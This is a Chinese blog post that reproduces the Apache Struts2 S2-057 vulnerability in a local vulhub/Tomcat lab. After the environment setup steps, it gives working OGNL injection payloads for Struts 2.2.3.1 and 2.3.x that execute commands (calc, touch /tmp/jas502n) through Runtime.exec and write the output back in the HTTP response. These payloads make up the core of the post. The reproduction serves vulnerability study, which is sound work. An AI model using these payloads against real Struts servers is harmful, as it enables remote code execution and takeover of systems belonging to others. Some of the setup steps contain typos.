admin

S2-057复现
st2-057复现参考少宇大佬的github:https://github.com/jas502n/St2-057...
扫描右侧二维码阅读全文
23
2018/08

S2-057复现

st2-057复现

参考少宇大佬的github:https://github.com/jas502n/St2-057

搭建环境

  1. 搭建docker 安装docker-compose
  2. git克隆P神的vulhub到本地 git clone https://github.com/vulhub/vulhub.git
  3. 进入到vulhub的struts-048 运行docker镜像
  4. 下载受st2-057的影响的struts2版本
    mkdir /usr/local/tomcat/webapps/test 
    cd /usr/local/tomcat/webapps/test 
    wget https://fossies.org/linux/www/legacy/struts-2.5.16-all.zip
    apt-get install unzip -y
    uzip struts-2.5.16-all.zip
    cp struts2-showcase.war /usr/local/tomcat/webapps/
  1. 部署war并修改两处struts-actionchaining配置文件
/usr/local/tomcat/webapps/struts2-showcase/WEB-INF/classes/struts-actionchaining.xml
/usr/local/tomcat/webapps/struts2-showcase/WEB-INF/src/java/struts-actionchaining.xml

改为
<struts>
    <package name="actionchaining" extends="struts-default">
        <action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1">
           <result type="redirectAction">
             <param name = "actionName">register2</param>
           </result>
        </action>
    </package>
</struts>
  1. 终止tomcat重新部署docker

POC验证

命令执行

${(111+111)}/actionChain1.action

由于在比较新的版本的OGNL包中,OgnlContext移除了CONTEXT_CONTEXT_KEY、CLASS_RESOLVER_CONTEXT_KEY和MEMBER_ACCESS_CONTEXT_KEY,使OGNL表达式无法继续使用#context、#_classResolver和#_memberAccess来获得相应对象
所以目前所有的poc只能再低版本的struts2执行已知可以使用的版本有2.3 和2.2.3.1可以复现出

2.2.31 poc:
Windows:

http://127.0.0.1:8080/struts3-showcase/%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec('calc').getInputStream()%2c%23b%3dnew%20java.io.InputStreamReader(%23a)%2c%23c%3dnew %20java.io.BufferedReader(%23b)%2c%23d%3dnew%20char%5b51020%5d%2c%23c.read(%23d)%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23sbtest.println(%23d)%2c%23sbtest.close())%7d/actionChain1.action

Linux:

http://127.0.0.1:8080/struts3-showcase/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27touch /tmp/jas502n%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action

2.3.x poc:

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#cmd=@java.lang.Runtime@getRuntime().exec("calc"))}

原理分析推荐chybeta师傅的 :
https://xz.aliyun.com/t/2618

环境搭建及复现视频(没有录制弹出计算器,可自行参考少宇大佬的GitHub给出的poc复现):

链接: https://pan.baidu.com/s/16XZGIL65VIs0RKJzA49j8g 密码: 2c46

Last modification:September 2nd, 2018 at 08:36 pm
If you think my article is useful to you, please feel free to appreciate

Leave a Comment